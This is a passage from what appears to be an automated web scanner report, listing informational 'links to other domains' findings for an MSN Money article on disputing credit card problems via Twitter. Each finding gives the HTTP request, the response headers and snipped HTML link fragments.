...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&amp;form=MSMONY" class="opennew">Personal finance on Twitter</a>
...[SNIP]...
messages can be helpful. "Customer service is one of the most logical and valuable uses of Twitter," says Christophe Langlois, who tracks the social media use of financial institutions on the website <a class="opennew" href="http://www.Visible-Banking.com/">Visible-Banking</a>
...[SNIP]...
<p>Like most major financial institutions, MasterCard has channels on Twitter and <a class="opennew" href="http://www.facebook.com/">Facebook</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/dispute-credit-card-product-merchant-1282.php?aid=46bf5df1" class="opennew">How to dispute a credit card bill with a merchant</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/change-financial-bad-habits-8-steps-1281.php?aid=46bf5df1" class="opennew">How to change financial bad habits in 8 steps </a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/foreign-exchange-fees-going-up-1267.php?aid=46bf5df1" class="opennew">Credit card foreign transaction fees going up </a>
...[SNIP]...
trlBinary', 'True','1');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ary', 'True','0');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTTBewGalOM4CqQLRfE7MRRgpeJSYNQ8u?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XOztDHmYtNsLgsi3J70SuxV6ufY2pIO8h?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-42c4e20842732b88.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">MARK WITT
..(SUPERSONIC1)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-42c4e20842732b88.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/static/16" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X-N4L5e1Iiimc9fZcIIHXPa6g7EHfXCf-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X-N4L5e1Iiimc9fZcIIHXPa6g7EHfXCf-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
, [ALITALIA] &#160;I am still without my money. Tell me, am I expected to be courteous after 16 letters, 17 phone calls, (15 were overseas), and 24 emails? Please do advise and have a very nice day ; )<img src="http://us.social.s-redacted/s/images/emoticons/regular_smile.gif" alt="Smile" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xv3Z740NyrClWi1ZVK-YSnMVUDX9ujh9d?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XCVWVNin8ahOnxbu6CkILsHwH9Nb0iHEA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4Qa8-uoUmEQdtynN8UHyDsm0Gf4yux_w?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhHKEEqDclSE9c3w1kYC384bKtOH8c9QD?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xy9lyrB9uNmQYnrDXykw1bou-4mmDzNFp?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XPfeT1kpYS7Wn-RcQ1SZR5hEkyQXJ2qN6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHbIFZX69e-qNzxvkIyimvEbvjpCVpW6S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGoG-LEpQfUy6k-KMKBYowSsHdlMkNkJh?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTTBewGalOM4CqQLRfE7MRRgpeJSYNQ8u?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&amp;form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&amp;form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&amp;form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&amp;go=&amp;form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&amp;form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.186. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=453669d26c8f4551bf1ae57a282e1e73; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:50:59 GMT
Content-Length: 114371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406259&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fcredit-cards%2FTwitter-credit-card-problem-solver-credit-cards.aspx%3FGT1%3D33001&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<cite>By <a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew">CreditCards.com</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew"><img src="http://colstb.msn.com/i/7E/1944B57464FBD948FCCE16DB38BB4.jpg" width="120" height="30" alt="CreditCards.com on MSN Money" />
...[SNIP]...
<p>Why wait on endless hold to dispute a credit card fee over the phone when you can post your complaint on <a class="opennew" href="http://www.twitter.com/">Twitter</a>
...[SNIP]...
<p>Most major banks in the United States, including <a class="opennew" href="http://www.bing.com/search?q=wells+fargo&amp;form=MSMONY">Wells Fargo</a>, <a class="opennew" href="http://www.bing.com/search?q=bank+of+america&amp;form=MSMONY">Bank of America</a> and <a class="opennew" href="http://www.bing.com/search?q=citi&amp;form=MSMONY">Citi</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&amp;form=MSMONY" class="opennew"><img src="http://moneycentral.redacted/content/data/images/Thumbnail/bingLogo-60.gif" width="60" height="27" alt="Search for personal finance on Twitter on Bing" class="img1" />
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&amp;form=MSMONY" class="opennew">Personal finance on Twitter</a>
...[SNIP]...
messages can be helpful. "Customer service is one of the most logical and valuable uses of Twitter," says Christophe Langlois, who tracks the social media use of financial institutions on the website <a class="opennew" href="http://www.Visible-Banking.com/">Visible-Banking</a>
...[SNIP]...
<p>Like most major financial institutions, MasterCard has channels on Twitter and <a class="opennew" href="http://www.facebook.com/">Facebook</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/dispute-credit-card-product-merchant-1282.php?aid=46bf5df1" class="opennew">How to dispute a credit card bill with a merchant</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/change-financial-bad-habits-8-steps-1281.php?aid=46bf5df1" class="opennew">How to change financial bad habits in 8 steps </a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/foreign-exchange-fees-going-up-1267.php?aid=46bf5df1" class="opennew">Credit card foreign transaction fees going up </a>
...[SNIP]...
rue','1');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
0');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTTBewGalOM4CqQLRfE7MRRgpeJSYNQ8u?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XOztDHmYtNsLgsi3J70SuxV6ufY2pIO8h?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-42c4e20842732b88.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">MARK WITT
..(SUPERSONIC1)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-42c4e20842732b88.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/static/16" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X-N4L5e1Iiimc9fZcIIHXPa6g7EHfXCf-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X-N4L5e1Iiimc9fZcIIHXPa6g7EHfXCf-?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
, [ALITALIA] &#160;I am still without my money. Tell me, am I expected to be courteous after 16 letters, 17 phone calls, (15 were overseas), and 24 emails? Please do advise and have a very nice day ; )<img src="http://us.social.s-redacted/s/images/emoticons/regular_smile.gif" alt="Smile" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xv3Z740NyrClWi1ZVK-YSnMVUDX9ujh9d?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XCVWVNin8ahOnxbu6CkILsHwH9Nb0iHEA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4Qa8-uoUmEQdtynN8UHyDsm0Gf4yux_w?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhHKEEqDclSE9c3w1kYC384bKtOH8c9QD?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xy9lyrB9uNmQYnrDXykw1bou-4mmDzNFp?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XPfeT1kpYS7Wn-RcQ1SZR5hEkyQXJ2qN6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHbIFZX69e-qNzxvkIyimvEbvjpCVpW6S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGoG-LEpQfUy6k-KMKBYowSsHdlMkNkJh?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTTBewGalOM4CqQLRfE7MRRgpeJSYNQ8u?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&amp;form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&amp;form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&amp;form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&amp;go=&amp;form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&amp;form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.187. http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:09:41 GMT
Content-Length: 91286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353382&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fcredit-cards%2FTwitter-credit-card-problem-solver-credit-cards.aspx%3FGT1%3D33001&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<cite>By <a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew">CreditCards.com</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew"><img src="http://colstb.msn.com/i/7E/1944B57464FBD948FCCE16DB38BB4.jpg" width="120" height="30" alt="CreditCards.com on MSN Money" />
...[SNIP]...
<p>Why wait on endless hold to dispute a credit card fee over the phone when you can post your complaint on <a class="opennew" href="http://www.twitter.com/">Twitter</a>
...[SNIP]...
<p>Most major banks in the United States, including <a class="opennew" href="http://www.bing.com/search?q=wells+fargo&amp;form=MSMONY">Wells Fargo</a>, <a class="opennew" href="http://www.bing.com/search?q=bank+of+america&amp;form=MSMONY">Bank of America</a> and <a class="opennew" href="http://www.bing.com/search?q=citi&amp;form=MSMONY">Citi</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&amp;form=MSMONY" class="opennew"><img src="http://moneycentral.redacted/content/data/images/Thumbnail/bingLogo-60.gif" width="60" height="27" alt="Search for personal finance on Twitter on Bing" class="img1" />
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&amp;form=MSMONY" class="opennew">Personal finance on Twitter</a>
...[SNIP]...
messages can be helpful. "Customer service is one of the most logical and valuable uses of Twitter," says Christophe Langlois, who tracks the social media use of financial institutions on the website <a class="opennew" href="http://www.Visible-Banking.com/">Visible-Banking</a>
...[SNIP]...
<p>Like most major financial institutions, MasterCard has channels on Twitter and <a class="opennew" href="http://www.facebook.com/">Facebook</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/dispute-credit-card-product-merchant-1282.php?aid=46bf5df1" class="opennew">How to dispute a credit card bill with a merchant</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/change-financial-bad-habits-8-steps-1281.php?aid=46bf5df1" class="opennew">How to change financial bad habits in 8 steps </a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/foreign-exchange-fees-going-up-1267.php?aid=46bf5df1" class="opennew">Credit card foreign transaction fees going up </a>
...[SNIP]...
